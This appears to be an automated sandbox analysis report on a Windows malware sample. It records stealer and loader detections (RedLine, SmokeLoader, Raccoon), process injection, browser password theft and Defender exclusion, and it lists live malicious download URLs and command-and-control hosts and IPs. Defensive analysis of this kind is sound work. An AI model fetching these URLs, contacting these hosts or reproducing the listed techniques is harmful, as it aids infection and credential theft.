                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeCode function: 0_2_00421DB0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00421DB0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B204020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion,30_2_6B204020

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 40.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.2049.exe.4016e00.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.2049.exe.4016e00.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.2049.exe.3a14940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.2049.exe.3999510.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000028.00000000.469526314.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000000.472626194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000000.471109376.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000000.473648101.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.504210996.0000000003999000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 0.2.SYzU0M7gx6.exe.2be15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.dtrsehc.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.3C9D.exe.3080e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.dtrsehc.2be15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.SYzU0M7gx6.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.1.dtrsehc.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.1.SYzU0M7gx6.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.1.9A51.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.9A51.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.3.3C9D.exe.3090000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.3C9D.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.9A51.exe.2bf15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.306623599.00000000004D1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.455599908.0000000004910000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.368282987.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.368357098.00000000005B1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.432262318.0000000003090000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.433825471.0000000004B61000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.413492109.0000000003090000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.306542749.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000000.288440777.0000000002861000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.456636829.0000000004A41000.00000004.00020000.sdmp, type: MEMORY
                      Yara detected Raccoon StealerShow sources
                      Source: Yara matchFile source: 37.3.B644.exe.4850000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.3.B644.exe.4850000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000025.00000003.445981143.0000000004850000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: B644.exe PID: 6896, type: MEMORYSTR
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\B644.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\AppData\Local\Temp\B644.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

                      Remote Access Functionality:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 40.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.2049.exe.4016e00.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.2049.exe.4016e00.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.2049.exe.3a14940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.2049.exe.3999510.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000028.00000000.469526314.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000000.472626194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000000.471109376.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000000.473648101.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.504210996.0000000003999000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 0.2.SYzU0M7gx6.exe.2be15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.dtrsehc.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.3C9D.exe.3080e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.dtrsehc.2be15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.SYzU0M7gx6.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.1.dtrsehc.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.1.SYzU0M7gx6.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.1.9A51.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.9A51.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.3.3C9D.exe.3090000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.3C9D.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.9A51.exe.2bf15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.306623599.00000000004D1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.455599908.0000000004910000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.368282987.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.368357098.00000000005B1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.432262318.0000000003090000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.433825471.0000000004B61000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.413492109.0000000003090000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.306542749.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000000.288440777.0000000002861000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.456636829.0000000004A41000.00000004.00020000.sdmp, type: MEMORY
                      Yara detected Raccoon StealerShow sources
                      Source: Yara matchFile source: 37.3.B644.exe.4850000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.3.B644.exe.4850000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000025.00000003.445981143.0000000004850000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: B644.exe PID: 6896, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsNative API1DLL Side-Loading1Exploitation for Privilege Escalation1Disable or Modify Tools11OS Credential Dumping1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer14Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsShared Modules1Application Shimming1DLL Side-Loading1Deobfuscate/Decode Files or Information1Input Capture1File and Directory Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsExploitation for Client Execution1Windows Service1Application Shimming1Obfuscated Files or Information3Security Account ManagerSystem Information Discovery15SMB/Windows Admin SharesInput Capture1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsCommand and Scripting Interpreter1Logon Script (Mac)Access Token Manipulation1Software Packing12NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol5SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsService Execution2Network Logon ScriptWindows Service1Timestomp1LSA SecretsSecurity Software Discovery431SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol126Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonProcess Injection712DLL Side-Loading1Cached Domain CredentialsVirtualization/Sandbox Evasion131VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading11Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion131/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronProcess Injection712Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdHidden Files and Directories1KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 511802 Sample: SYzU0M7gx6.exe Startdate: 29/10/2021 Architecture: WINDOWS Score: 100 66 znpst.top 2->66 68 nusurtal4f.net 2->68 92 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->92 94 Found malware configuration 2->94 96 Antivirus detection for URL or domain 2->96 98 14 other signatures 2->98 11 SYzU0M7gx6.exe 2->11         started        13 dtrsehc 2->13         started        signatures3 process4 signatures5 16 SYzU0M7gx6.exe 11->16         started        142 Machine Learning detection for dropped file 13->142 19 dtrsehc 13->19         started        process6 signatures7 84 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 16->84 86 Maps a DLL or memory area into another process 16->86 88 Checks if the current machine is a virtual machine (disk enumeration) 16->88 90 Creates a thread in another existing process (thread injection) 16->90 21 explorer.exe 12 16->21 injected process8 dnsIp9 70 sysaheu90.top 185.98.87.159, 49750, 49752, 49753 VM-HOSTINGRU Russian Federation 21->70 72 iyc.jelikob.ru 81.177.141.36, 443, 49817 RTCOMM-ASRU Russian Federation 21->72 74 4 other IPs or domains 21->74 50 C:\Users\user\AppData\Roaming\gjrsehc, PE32 21->50 dropped 52 C:\Users\user\AppData\Roaming\dtrsehc, PE32 21->52 dropped 54 C:\Users\user\AppData\Local\Temp\B644.exe, PE32 21->54 dropped 56 7 other malicious files 21->56 dropped 108 System process connects to network (likely due to code injection or exploit) 21->108 110 Benign windows process drops PE files 21->110 112 Deletes itself after installation 21->112 114 Hides that the sample has been downloaded from the Internet (zone.identifier) 21->114 26 3C9D.exe 1 21->26         started        30 2049.exe 21 7 21->30         started        33 6630.exe 21->33         started        35 5 other processes 21->35 file10 signatures11 process12 dnsIp13 58 C:\Users\user\AppData\Local\Temp\1105.tmp, PE32 26->58 dropped 116 Multi AV Scanner detection for dropped file 26->116 118 DLL reload attack detected 26->118 120 Detected unpacking (changes PE section rights) 26->120 138 2 other signatures 26->138 76 cdn.discordapp.com 162.159.129.233, 443, 49810, 49812 CLOUDFLARENETUS United States 30->76 60 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 30->60 dropped 122 Machine Learning detection for dropped file 30->122 124 Writes to foreign memory regions 30->124 126 Allocates memory in foreign processes 30->126 140 2 other signatures 30->140 128 Maps a DLL or memory area into another process 33->128 130 Checks if the current machine is a virtual machine (disk enumeration) 33->130 132 Creates a thread in another existing process (thread injection) 33->132 78 194.180.174.181, 49845, 80 MIVOCLOUDMD unknown 35->78 80 telegalive.top 35->80 82 4 other IPs or domains 35->82 62 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 35->62 dropped 64 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 35->64 dropped 134 Tries to harvest and steal browser information (history, passwords, etc) 35->134 136 Adds a directory exclusion to Windows Defender 35->136 37 9A51.exe 35->37         started        40 AdvancedRun.exe 35->40         started        42 powershell.exe 35->42         started        44 2 other processes 35->44 file14 signatures15 process16 signatures17 100 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 37->100 102 Maps a DLL or memory area into another process 37->102 104 Checks if the current machine is a virtual machine (disk enumeration) 37->104 106 Creates a thread in another existing process (thread injection) 37->106 46 AdvancedRun.exe 40->46         started        48 conhost.exe 42->48         started        process18

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      SYzU0M7gx6.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\dtrsehc100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\2049.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\6630.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\9A51.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\5508.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\B644.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\3C9D.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\3113.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\gjrsehc100%Joe Sandbox ML
                      C:\Users\user\AppData\LocalLow\sqlite3.dll0%MetadefenderBrowse
                      C:\Users\user\AppData\LocalLow\sqlite3.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\1105.tmp0%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\1105.tmp2%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\2049.exe30%ReversingLabsByteCode-MSIL.Trojan.CrypterX
                      C:\Users\user\AppData\Local\Temp\3113.exe22%ReversingLabsByteCode-MSIL.Trojan.CrypterX
                      C:\Users\user\AppData\Local\Temp\3C9D.exe80%ReversingLabsWin32.Ransomware.StopCrypt
                      C:\Users\user\AppData\Local\Temp\5508.exe43%ReversingLabsByteCode-MSIL.Trojan.Heracles
                      C:\Users\user\AppData\Local\Temp\6630.exe45%ReversingLabsWin32.Trojan.Convagent
                      C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exe0%ReversingLabs
                      C:\Users\user\AppData\Roaming\gjrsehc80%ReversingLabsWin32.Ransomware.StopCrypt

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      21.0.dtrsehc.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      19.2.9A51.exe.2bf15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      40.0.aspnet_regbrowsers.exe.400000.4.unpack100%AviraHEUR/AGEN.1141492Download File
                      34.2.6630.exe.4900e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      21.2.dtrsehc.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      20.0.9A51.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      21.0.dtrsehc.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.2.SYzU0M7gx6.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      34.3.6630.exe.4910000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      21.1.dtrsehc.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.2.dtrsehc.2be15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      40.0.aspnet_regbrowsers.exe.400000.1.unpack100%AviraHEUR/AGEN.1141492Download File
                      3.1.SYzU0M7gx6.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      20.1.9A51.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      30.2.3C9D.exe.3080e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.0.SYzU0M7gx6.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.0.SYzU0M7gx6.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.2.SYzU0M7gx6.exe.2be15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      20.2.9A51.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      40.0.aspnet_regbrowsers.exe.400000.3.unpack100%AviraHEUR/AGEN.1141492Download File
                      20.0.9A51.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      30.1.3C9D.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      40.0.aspnet_regbrowsers.exe.400000.2.unpack100%AviraHEUR/AGEN.1141492Download File
                      20.0.9A51.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      30.2.3C9D.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      21.0.dtrsehc.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      34.2.6630.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      30.3.3C9D.exe.3090000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      40.0.aspnet_regbrowsers.exe.400000.0.unpack100%AviraHEUR/AGEN.1141492Download File
                      3.0.SYzU0M7gx6.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://tempuri.org/DetailsDataSet1.xsd0%Avira URL Cloudsafe
                      http://telegalive.top/agrybirdsgamerept100%Avira URL Cloudmalware
                      http://sysaheu90.top/game.exe100%Avira URL Cloudmalware
                      https://api.ip.sb/ip0%URL Reputationsafe
                      http://194.180.174.181//l/f/9Z2CynwB3dP17SpzOnMI/ffdc8614f62a76a5c7889757f570f02f455435ee0%Avira URL Cloudsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://hajegalive.top/0%Avira URL Cloudsafe
                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                      http://schemas.micr0%URL Reputationsafe
                      http://privacytoolzforyou-6000.top/downloads/toolspab2.exe100%Avira URL Cloudmalware
                      http://194.180.174.181//l/f/9Z2CynwB3dP17SpzOnMI/1a86e602d0d2d72a354901c42f4d11f8f79e44b10%Avira URL Cloudsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      https://iyc.jelikob.ru/263873486.exe0%Avira URL Cloudsafe
                      https://193.56.146.214/0%Avira URL Cloudsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      https://sectigo.com/CPS0C0%URL Reputationsafe
